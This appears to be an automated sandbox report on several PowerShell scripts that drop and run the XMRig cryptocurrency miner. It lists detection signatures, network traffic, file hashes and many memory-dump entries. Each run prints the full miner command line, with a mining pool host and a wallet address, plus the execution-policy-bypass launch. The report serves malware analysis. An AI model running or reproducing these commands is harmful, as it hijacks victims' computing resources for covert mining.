memory/4176-138-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-139-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-140-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-141-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-142-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-143-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-144-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-145-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-146-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-147-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-148-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-149-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-150-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-151-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-152-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-153-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-154-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-155-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-156-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-157-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 00:46

Platform

win10v2004-20240508-en

Max time kernel

1790s

Max time network

1801s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 215.143.182.52.in-addr.arpa udp

Files

memory/4344-0-0x00007FFEE9B43000-0x00007FFEE9B45000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2ahpjq2s.z2h.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4344-11-0x00007FFEE9B40000-0x00007FFEEA601000-memory.dmp

memory/4344-10-0x0000016D37AB0000-0x0000016D37AD2000-memory.dmp

memory/4344-12-0x00007FFEE9B40000-0x00007FFEEA601000-memory.dmp

memory/4344-14-0x00007FFEE9B40000-0x00007FFEEA601000-memory.dmp

memory/4344-15-0x0000016D50050000-0x0000016D50062000-memory.dmp

memory/4344-16-0x0000016D37A80000-0x0000016D37A8A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4180-47-0x000001B4C1900000-0x000001B4C1920000-memory.dmp

memory/4180-48-0x000001B4C1A50000-0x000001B4C1A70000-memory.dmp

memory/4180-49-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-51-0x000001B4C1A70000-0x000001B4C1A90000-memory.dmp

memory/4180-52-0x000001B4C1A90000-0x000001B4C1AB0000-memory.dmp

memory/4344-50-0x00007FFEE9B43000-0x00007FFEE9B45000-memory.dmp

memory/4344-54-0x00007FFEE9B40000-0x00007FFEEA601000-memory.dmp

memory/4180-53-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4344-56-0x00007FFEE9B40000-0x00007FFEEA601000-memory.dmp

memory/4180-55-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-57-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-58-0x000001B4C1A70000-0x000001B4C1A90000-memory.dmp

memory/4180-59-0x000001B4C1A90000-0x000001B4C1AB0000-memory.dmp

memory/4180-60-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-61-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-62-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-63-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-64-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-65-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-66-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-67-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-68-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-69-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-70-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-71-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-72-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-73-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-74-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-75-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-76-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-77-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-78-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-79-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-80-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-81-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-82-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-83-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-84-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-85-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-86-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-87-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-88-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-89-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-90-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-91-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-92-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-93-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-94-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-95-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-96-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-97-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-98-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-99-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-100-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-101-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-102-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-103-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-104-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-105-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-106-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-107-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-108-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-109-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-110-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-111-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-112-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-113-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-114-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-115-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-116-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-117-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-118-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 00:50

Platform

win10v2004-20240426-en

Max time kernel

1799s

Max time network

1802s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 14.179.89.13.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_g54m21hm.had.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral10

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 00:50

Platform

win10-20240404-en

Max time kernel

1799s

Max time network

1792s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 25.73.42.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_odof5pbr.e0w.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral11

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 00:50

Platform

win10v2004-20240426-en

Max time kernel

1799s

Max time network

1790s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 91.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 6.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3xchbhhl.k4j.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral21

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 00:55

Platform

win10v2004-20240426-en

Max time kernel

1791s

Max time network

1773s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 80.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 90.16.208.104.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_z0on1hao.lyt.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3


memory/3268-107-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

memory/3268-108-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

memory/3268-109-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

